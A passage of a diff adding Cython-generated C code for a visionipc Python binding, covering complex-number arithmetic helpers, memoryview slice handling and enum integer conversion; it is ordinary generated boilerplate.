a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabsf(b.real) >= fabsf(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + float r = b.imag / b.real; + float s = (float)(1.0) / (b.real + b.imag * r); + return __pyx_t_float_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + float r = b.real / b.imag; + float s = (float)(1.0) / (b.imag + b.real * r); + return __pyx_t_float_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + float denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_float_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrtf(z.real*z.real + z.imag*z.imag); + #else + return hypotf(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + float r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + float denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_float(a, a); + case 3: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, a); + case 4: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = powf(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2f(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_float(a); + theta = atan2f(a.imag, a.real); + } + lnr = logf(r); + z_r = expf(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cosf(z_theta); + z.imag = z_r * sinf(z_theta); + return z; + } + #endif +#endif + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return ::std::complex< double >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return x + y*(__pyx_t_double_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + __pyx_t_double_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabs(b.real) >= fabs(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + double r = b.imag / b.real; + double s = (double)(1.0) / (b.real + b.imag * r); + return __pyx_t_double_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + double r = b.real / b.imag; + double s = (double)(1.0) / (b.imag + b.real * r); + return __pyx_t_double_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + double denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_double_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrt(z.real*z.real + z.imag*z.imag); + #else + return hypot(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + double r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + double denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_double(a, a); + case 3: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, a); + case 4: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = pow(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_double(a); + theta = atan2(a.imag, a.real); + } + lnr = log(r); + z_r = exp(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cos(z_theta); + z.imag = z_r * sin(z_theta); + return z; + } + #endif +#endif + +/* MemviewSliceCopyTemplate */ + static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object) +{ + __Pyx_RefNannyDeclarations + int i; + __Pyx_memviewslice new_mvs = { 0, 0, { 0 }, { 0 }, { 0 } }; + struct __pyx_memoryview_obj *from_memview = from_mvs->memview; + Py_buffer *buf = &from_memview->view; + PyObject *shape_tuple = NULL; + PyObject *temp_int = NULL; + struct __pyx_array_obj *array_obj = NULL; + struct __pyx_memoryview_obj *memview_obj = NULL; + __Pyx_RefNannySetupContext("__pyx_memoryview_copy_new_contig", 0); + for (i = 0; i < ndim; i++) { + if (unlikely(from_mvs->suboffsets[i] >= 0)) { + PyErr_Format(PyExc_ValueError, "Cannot copy memoryview slice with " + "indirect dimensions (axis %d)", i); + goto fail; + } + } + shape_tuple = PyTuple_New(ndim); + if (unlikely(!shape_tuple)) { + goto fail; + } + __Pyx_GOTREF(shape_tuple); + for(i = 0; i < ndim; i++) { + temp_int = PyInt_FromSsize_t(from_mvs->shape[i]); + if(unlikely(!temp_int)) { + goto fail; + } else { + PyTuple_SET_ITEM(shape_tuple, i, temp_int); + temp_int = NULL; + } + } + array_obj = __pyx_array_new(shape_tuple, sizeof_dtype, buf->format, (char *) mode, NULL); + if (unlikely(!array_obj)) { + goto fail; + } + __Pyx_GOTREF(array_obj); + memview_obj = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + (PyObject *) array_obj, contig_flag, + dtype_is_object, + from_mvs->memview->typeinfo); + if (unlikely(!memview_obj)) + goto fail; + if (unlikely(__Pyx_init_memviewslice(memview_obj, ndim, &new_mvs, 1) < 0)) + goto fail; + if (unlikely(__pyx_memoryview_copy_contents(*from_mvs, new_mvs, ndim, ndim, + dtype_is_object) < 0)) + goto fail; + goto no_fail; +fail: + __Pyx_XDECREF(new_mvs.memview); + new_mvs.memview = NULL; + new_mvs.data = NULL; +no_fail: + __Pyx_XDECREF(shape_tuple); + __Pyx_XDECREF(temp_int); + __Pyx_XDECREF(array_obj); + __Pyx_RefNannyFinishContext(); + return new_mvs; +} + +/* MemviewSliceInit */ + static int +__Pyx_init_memviewslice(struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference) +{ + __Pyx_RefNannyDeclarations + int i, retval=-1; + Py_buffer *buf = &memview->view; + __Pyx_RefNannySetupContext("init_memviewslice", 0); + if (unlikely(memviewslice->memview || memviewslice->data)) { + PyErr_SetString(PyExc_ValueError, + "memviewslice is already initialized!"); + goto fail; + } + if (buf->strides) { + for (i = 0; i < ndim; i++) { + memviewslice->strides[i] = buf->strides[i]; + } + } else { + Py_ssize_t stride = buf->itemsize; + for (i = ndim - 1; i >= 0; i--) { + memviewslice->strides[i] = stride; + stride *= buf->shape[i]; + } + } + for (i = 0; i < ndim; i++) { + memviewslice->shape[i] = buf->shape[i]; + if (buf->suboffsets) { + memviewslice->suboffsets[i] = buf->suboffsets[i]; + } else { + memviewslice->suboffsets[i] = -1; + } + } + memviewslice->memview = memview; + memviewslice->data = (char *)buf->buf; + if (__pyx_add_acquisition_count(memview) == 0 && !memview_is_new_reference) { + Py_INCREF(memview); + } + retval = 0; + goto no_fail; +fail: + memviewslice->memview = 0; + memviewslice->data = 0; + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} +#ifndef Py_NO_RETURN +#define Py_NO_RETURN +#endif +static void __pyx_fatalerror(const char *fmt, ...) Py_NO_RETURN { + va_list vargs; + char msg[200]; +#if PY_VERSION_HEX >= 0x030A0000 || defined(HAVE_STDARG_PROTOTYPES) + va_start(vargs, fmt); +#else + va_start(vargs); +#endif + vsnprintf(msg, 200, fmt, vargs); + va_end(vargs); + Py_FatalError(msg); +} +static CYTHON_INLINE int +__pyx_add_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)++; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE int +__pyx_sub_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)--; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE void +__Pyx_INC_MEMVIEW(__Pyx_memviewslice *memslice, int have_gil, int lineno) +{ + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + return; + } + old_acquisition_count = __pyx_add_acquisition_count(memview); + if (unlikely(old_acquisition_count <= 0)) { + if (likely(old_acquisition_count == 0)) { + if (have_gil) { + Py_INCREF((PyObject *) memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_INCREF((PyObject *) memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count+1, lineno); + } + } +} +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *memslice, + int have_gil, int lineno) { + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + memslice->memview = NULL; + return; + } + old_acquisition_count = __pyx_sub_acquisition_count(memview); + memslice->data = NULL; + if (likely(old_acquisition_count > 1)) { + memslice->memview = NULL; + } else if (likely(old_acquisition_count == 1)) { + if (have_gil) { + Py_CLEAR(memslice->memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_CLEAR(memslice->memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count-1, lineno); + } +} + +/* TypeInfoToFormat */ + static struct __pyx_typeinfo_string __Pyx_TypeInfoToFormat(__Pyx_TypeInfo *type) { + struct __pyx_typeinfo_string result = { {0} }; + char *buf = (char *) result.string; + size_t size = type->size; + switch (type->typegroup) { + case 'H': + *buf = 'c'; + break; + case 'I': + case 'U': + if (size == 1) + *buf = (type->is_unsigned) ? 'B' : 'b'; + else if (size == 2) + *buf = (type->is_unsigned) ? 'H' : 'h'; + else if (size == 4) + *buf = (type->is_unsigned) ? 'I' : 'i'; + else if (size == 8) + *buf = (type->is_unsigned) ? 'Q' : 'q'; + break; + case 'P': + *buf = 'P'; + break; + case 'C': + { + __Pyx_TypeInfo complex_type = *type; + complex_type.typegroup = 'R'; + complex_type.size /= 2; + *buf++ = 'Z'; + *buf = __Pyx_TypeInfoToFormat(&complex_type).string[0]; + break; + } + case 'R': + if (size == 4) + *buf = 'f'; + else if (size == 8) + *buf = 'd'; + else + *buf = 'g'; + break; + } + return result; +} + +/* CIntFromPy */ + static CYTHON_INLINE enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType neg_one = (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1, const_zero = (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) >= 2 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) >= 3 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) >= 4 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[3]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 2 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)-1)*(((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 2 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) ((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 3 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)-1)*(((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 3 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) ((((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 4 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) (((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)-1)*(((((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[3]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) - 1 > 4 * PyLong_SHIFT)) { + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) ((((((((((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[3]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[2]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[1]) << PyLong_SHIFT) | (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + PyErr_SetString(PyExc_RuntimeError, + "_PyLong_AsByteArray() not available, cannot convert large enums"); + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1; + } else { + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1; + val = __Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(tmp); + 